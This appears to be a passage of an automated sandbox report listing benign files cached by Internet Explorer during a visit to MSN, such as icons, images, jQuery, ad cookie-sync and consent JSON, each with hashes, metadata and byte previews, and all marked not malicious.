                                                                                                                                                                                                                                                        Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs...........~..../IDAT8O..QR.@...........Wn...T."...(...@..k..r.>2.n.d.....q.f...nw.l....J.2.....i!..(.s... .p..5Ve.t.e...........|j.M|)>'..=..Yzy"..:.p>[..H.1f'!Zz.&.Mp...R.....j.~.>.N........we./XB.Wdm.@7.,.m..Z{4p{..p.xg...T...c.}...r.=VO.Qg...|2.I...h.v.......6.D...V.k...Z.0.....-.#....t..sh...b....T......o..s.Bh......IEND.B`.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB10MkbM[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):936
                                                                                                                                                                                                                                                        Entropy (8bit):7.711185429072882
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:IJJuYNKuGlZLocJZlxAgAbiuoSrZzi1g3+:IJn94F/lxAZiuoSNYgO
                                                                                                                                                                                                                                                        MD5:19B9391F3CA20AA5671834C668105A22
                                                                                                                                                                                                                                                        SHA1:81C2522FC7C808683191D2469426DFC06100F574
                                                                                                                                                                                                                                                        SHA-256:3557A603145306F90828FF3EA70902A1822E8B117F4BDF39933A2A413A79399F
                                                                                                                                                                                                                                                        SHA-512:0E4BA430498B10CE0622FF745A4AE352FDA75E44C50C7D5EBBC270E68D56D8750CE89435AE3819ACA7C2DD709264E71CE7415B7EBAB24704B83380A5B99C66DC
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB10MkbM.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                                                        Preview: .PNG........IHDR................a....pHYs..........+.....ZIDATx.m._hSW....?....E...U.Z.M..a.1.}P..6+.....l......LDA......u.a.U..P..&k..Iz...&....R_.q.=p8....~.'...5..}......_.I$FS.\.c][4#.........+...U@fZz.Y.......|.7....r.x..S.?.ws....B9.P.-Yt*..N.}.'V......G...5....uc....XV.=.{..ai.pw.v)...(.9.z\|.3:Q..,qr.es...ZTp..Mt.iB.2.{w.C*WB..F...b../.H..\..*.).0l.R......c........@S5.?3...q..:..8.?....p.=6`..T...5.nn........]..b.j.,..pf.....8...".M..?.@K...L.='.1.O.2Kb.p..(..\.D.......n..._.....0.............w^bR....v\..)..l..f..l..M.m.6t.7....U.Y3?.h=..!.<.._........pL..V"[.......{[P....e07...Wc....IH.T@...*..A@.......;....>Gt&...}...o...KP...7W1.sm~...&.......00.....>/....l.#.t......2.....L_Owu.*.A)...-.w.*.1/+.)....XR.A#;..X...p..3!...H.....f.ok;..|x..1.R.\W.H\...<..<&.M!mk:|....%.<..,.%.g..g..G@z^Q..I...T.D^..G.&v6$.J.2J....~..Y\kX.j.......c.&.>.3..........ek..+..~B.\......IEND.B`.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB14hq0P[1].jpg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):19135
                                                                                                                                                                                                                                                        Entropy (8bit):7.696449301996147
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:IHtFIzAsGkT2tP9ah048vTWjczBRfCghSyOaWLxyAy3FN5GU643lb1y6N0:INFIFTsEG46SjcbmaWLsR3FNY/Ayz
                                                                                                                                                                                                                                                        MD5:01269B6BB16F7D4753894C9DC4E35D8C
                                                                                                                                                                                                                                                        SHA1:B3EBFE430E1BBC0C951F6B7FB5662FEB69F53DEE
                                                                                                                                                                                                                                                        SHA-256:D3E92DB7FBE8DF1B9EA32892AD81853065AD2A68C80C50FB335363A5F24D227D
                                                                                                                                                                                                                                                        SHA-512:0AF92FBC8D3E06C3F82C6BA1DE0652706CA977ED10EEB664AE49DD4ADA3063119D194146F2B6D643F633D48AE7A841A14751F56CC41755B813B9C4A33B82E45C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB14hq0P.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                                                                        Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..h.h........(.h........(.h......Z.(........(.h........TNY...W....q@..~..<..h.....dG.@.........F....L.@%}.....-K.F.9...c..O.7X9u,%.k.4..4..c.<p"...cp.-...U.J.n2..9.b.d.SphR.\V.5Q-./.LV.6...HM.V.d^E...F.q.*+7..a.m..VOA..qR.X.rx5&.(..Q..P.R..x..WM-.?........V..GTi.(.(........(........J.(.(......J.(........Z.(........Z.(........Z.(........(.h.......i..H.@...;..Y...q...0.<e+.B...[.v..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1dCSOZ[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):432
                                                                                                                                                                                                                                                        Entropy (8bit):7.252548911424453
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:6v/lhPahm7saDdLbPvjAEQhnZxqQ7FULH4hYHgjtoYFWYooCUQVHyXRTTrYm/RTy:6v/79Zb8FZxqQJ4Yhro0Lsm96d
                                                                                                                                                                                                                                                        MD5:7ED73D785784B44CF3BD897AB475E5CF
                                                                                                                                                                                                                                                        SHA1:47A753F5550D727F2FB5535AD77F5042E5F6D954
                                                                                                                                                                                                                                                        SHA-256:EEEA2FBC7695452F186059EC6668A2C8AE469975EBBAF5140B8AC40F642AC466
                                                                                                                                                                                                                                                        SHA-512:FAF9E3AF38796B906F198712772ACBF361820367BDC550076D6D89C2F474082CC79725EC81CECF661FA9EFF3316EE10853C75594D5022319EAE9D078802D9C77
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dCSOZ.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                                                        Preview: .PNG........IHDR................a....pHYs..........+.....bIDATx..?..a..?.3.w`.x.&..d..Q.L..LJ^.o...,....DR,.$.O.....r.ws..<.<.|..|..x..?....^..j..r...F..v<.........t.d2.^...x<b6....\.WT...L".`8.R......m.N'..`0H.T..vc...@.H$..+..~..j....N.....~.O.Z%..+..T*.r...#.....F2..X,.Z.h4..R)z..6.s:...l2...l....N>...dB6.%..i...)....q...^..n.K&..^..X,>'..dT)..v:.0D.Q.y>.#.u:.,...Z..r..../h..u....#'.v........._&^....~..ol.#....IEND.B`.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\a5ea21[1].ico
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):758
                                                                                                                                                                                                                                                        Entropy (8bit):7.432323547387593
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
                                                                                                                                                                                                                                                        MD5:84CC977D0EB148166481B01D8418E375
                                                                                                                                                                                                                                                        SHA1:00E2461BCD67D7BA511DB230415000AEFBD30D2D
                                                                                                                                                                                                                                                        SHA-256:BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
                                                                                                                                                                                                                                                        SHA-512:F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                                                                                                                                                                                                                                                        Preview: .PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\adb3478e-c94c-4cdb-9882-fa384ccec861[1].jpg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):86424
                                                                                                                                                                                                                                                        Entropy (8bit):7.979519378625907
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:oXVk5kODvwkyh626qFydrCrE8rxd5mvXlz3QqlAXoX+wkrRsZtAVl:oXVk5hYkyhtzFy3O5WlrDlAw+FEAVl
                                                                                                                                                                                                                                                        MD5:D3CFBC30017E38E6EEEBADEDFD8A3503
                                                                                                                                                                                                                                                        SHA1:A9E354219DB237A4C0632B203C2260DDB977F5F1
                                                                                                                                                                                                                                                        SHA-256:2F3719AD8F485C5B7244E36693E03A942EA6AAC5B0F17E88718881C3F480D64A
                                                                                                                                                                                                                                                        SHA-512:6C74FE3FF4301C78C29119FF0BCCD19893003236C1DDBA229292F181C3CD6017AD23C72FA57F56B4C6800EB0004896AA3319117426378BBD95A45955736F95D6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://cvision.media.net/new/300x300/3/178/41/161/adb3478e-c94c-4cdb-9882-fa384ccec861.jpg?v=9
                                                                                                                                                                                                                                                        Preview: ......JFIF.............C....................................................................C.......................................................................,.,.."...........................................B.............................!."1.#A.2Q.$a3B.q.%4R....Cr....&S....................................A.........................!..."1.A#2Qa..q.$3BR......C...%ESbc...............?...=..Q%..c.....%<|....1....U/.._........_#...|......s....T0..J....D......D@.....%H...s a.].?0q0233<...G..q...w."......a....<{..NBEl.9d....f.Fc....?....7EWRj.b..u.O.....=..|wq=..??....}.r.\..[PO...... .'......f.k.f....3.e.8........&9..._.._m.....K.|........i.K..b.J|.)..c..........b#.......\|..?.._3?l..........<X..v8.aL6.].........8....._p!K...q1 P>NFf#......................~....x..r4.......xbNNV...{.O.{.....8....li.l.....DfR.T2yi.|}.......33..}G..u.>.'.ri[hT..G.kX..\@..wp-..8.............J......r.%.1>......c..Y.Y.....<.._.......|k...E.A'.m.k_.......j.8[..E.......!.g...~>~fb}-.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\cfdbd9[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):740
                                                                                                                                                                                                                                                        Entropy (8bit):7.552939906140702
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
                                                                                                                                                                                                                                                        MD5:FE5E6684967766FF6A8AC57500502910
                                                                                                                                                                                                                                                        SHA1:3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
                                                                                                                                                                                                                                                        SHA-256:3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
                                                                                                                                                                                                                                                        SHA-512:AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
                                                                                                                                                                                                                                                        Preview: .PNG........IHDR................U....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.*V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..*x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\checksync[1].htm
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):21264
                                                                                                                                                                                                                                                        Entropy (8bit):5.302916912228596
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:R7AGcVXlblcqnzleZSweg2f5ngB/LkPF3OZOyQWwY4RXrqt:F86qhbS2RxF3OsyQWwY4RXrqt
                                                                                                                                                                                                                                                        MD5:3723567BA10CD7D40559BFA7B1E1228A
                                                                                                                                                                                                                                                        SHA1:FC9ADA3298BA47DC5BDA9334756C76CBB785C02C
                                                                                                                                                                                                                                                        SHA-256:803A03EC64D08C78CFF4E829177D7B175FA5509D5E571FA14B33496249C3AFA7
                                                                                                                                                                                                                                                        SHA-512:7878C552398289F7BBFFC7C5121C2CFCC62C24080DDDB42A9133943F55E8C7D6BDE787F0E1383D12469BA2DFD2F604861078180BFF09070B540E36CC755DE848
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/c21lg-d.m
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\checksync[2].htm
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):21264
                                                                                                                                                                                                                                                        Entropy (8bit):5.302916912228596
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:R7AGcVXlblcqnzleZSweg2f5ngB/LkPF3OZOyQWwY4RXrqt:F86qhbS2RxF3OsyQWwY4RXrqt
                                                                                                                                                                                                                                                        MD5:3723567BA10CD7D40559BFA7B1E1228A
                                                                                                                                                                                                                                                        SHA1:FC9ADA3298BA47DC5BDA9334756C76CBB785C02C
                                                                                                                                                                                                                                                        SHA-256:803A03EC64D08C78CFF4E829177D7B175FA5509D5E571FA14B33496249C3AFA7
                                                                                                                                                                                                                                                        SHA-512:7878C552398289F7BBFFC7C5121C2CFCC62C24080DDDB42A9133943F55E8C7D6BDE787F0E1383D12469BA2DFD2F604861078180BFF09070B540E36CC755DE848
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/c21lg-d.m
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\de-ch[1].json
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):79097
                                                                                                                                                                                                                                                        Entropy (8bit):5.337866393801766
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCgP5HVN/QZYUmftKCB:olLEJxa4CmdiuWlDxHga7B
                                                                                                                                                                                                                                                        MD5:408DDD452219F77E388108945DE7D0FE
                                                                                                                                                                                                                                                        SHA1:C34BAE1E2EBD5867CB735A5C9573E08C4787E8E7
                                                                                                                                                                                                                                                        SHA-256:197C124AD4B7DD42D6628B9BEFD54226CCDCD631ECFAEE6FB857195835F3B385
                                                                                                                                                                                                                                                        SHA-512:17B4CF649A4EAE86A6A38ABA535CAF0AEFB318D06765729053FDE4CD2EFEE7C13097286D0B8595435D0EB62EF09182A9A10CFEE2E71B72B74A6566A2697EAB1B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/6f0cca92-2dda-4588-a757-0e009f333603/de-ch.json
                                                                                                                                                                                                                                                        Preview: {"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAll
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\iab2Data[1].json
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):242382
                                                                                                                                                                                                                                                        Entropy (8bit):5.1486574437549235
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:l3JqIW6A3pZcOkv+prD5bxLkjO68KQHamIT4Ff5+wbUk6syZ7TMwz:l3JqINA3kR4D5bxLk78KsIkfZ6hBz
                                                                                                                                                                                                                                                        MD5:D76FFE379391B1C7EE0773A842843B7E
                                                                                                                                                                                                                                                        SHA1:772ED93B31A368AE8548D22E72DDE24BB6E3855C
                                                                                                                                                                                                                                                        SHA-256:D0EB78606C49FCD41E2032EC6CC6A985041587AAEE3AE15B6D3B693A924F08F2
                                                                                                                                                                                                                                                        SHA-512:23E7888E069D05812710BF56CC76805A4E836B88F7493EC6F669F72A55D5D85AD86AD608650E708FA1861BC78A139616322D34962FD6BE0D64E0BEA0107BF4F4
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/iab2Data.json
                                                                                                                                                                                                                                                        Preview: {"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\jquery-2.1.1.min[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):84249
                                                                                                                                                                                                                                                        Entropy (8bit):5.369991369254365
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
                                                                                                                                                                                                                                                        MD5:9A094379D98C6458D480AD5A51C4AA27
                                                                                                                                                                                                                                                        SHA1:3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
                                                                                                                                                                                                                                                        SHA-256:B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
                                                                                                                                                                                                                                                        SHA-512:4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquery-2.1.1.min.js
                                                                                                                                                                                                                                                        Preview: /*! jQuery v2.1.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,funct
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\location[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):182
                                                                                                                                                                                                                                                        Entropy (8bit):4.685293041881485
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:LUfGC48HlHJ2R4OE9HQnpK9fQ8I5CMnRMRU8x4RiiP22/90+apWyRHfHO:nCf4R5ElWpKWjvRMmhLP2saVO
                                                                                                                                                                                                                                                        MD5:C4F67A4EFC37372559CD375AA74454A3
                                                                                                                                                                                                                                                        SHA1:2B7303240D7CBEF2B7B9F3D22D306CC04CBFBE56
                                                                                                                                                                                                                                                        SHA-256:C72856B40493B0C4A9FC25F80A10DFBF268B23B30A07D18AF4783017F54165DE
                                                                                                                                                                                                                                                        SHA-512:1EE4D2C1ED8044128DCDCDB97DC8680886AD0EC06C856F2449B67A6B0B9D7DE0A5EA2BBA54EB405AB129DD0247E605B68DC11CEB6A074E6CF088A73948AF2481
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                                                                                                                                                                                                                                                        Preview: jsonFeed({"country":"CH","state":"ZH","stateName":"Zurich","zipcode":"8152","timezone":"Europe/Zurich","latitude":"47.43000","longitude":"8.57180","city":"Zurich","continent":"EU"});
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AA3e6zI[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):357
                                                                                                                                                                                                                                                        Entropy (8bit):6.88912414461523
                                                                                                                                                                                                                                                        Encrypted:false
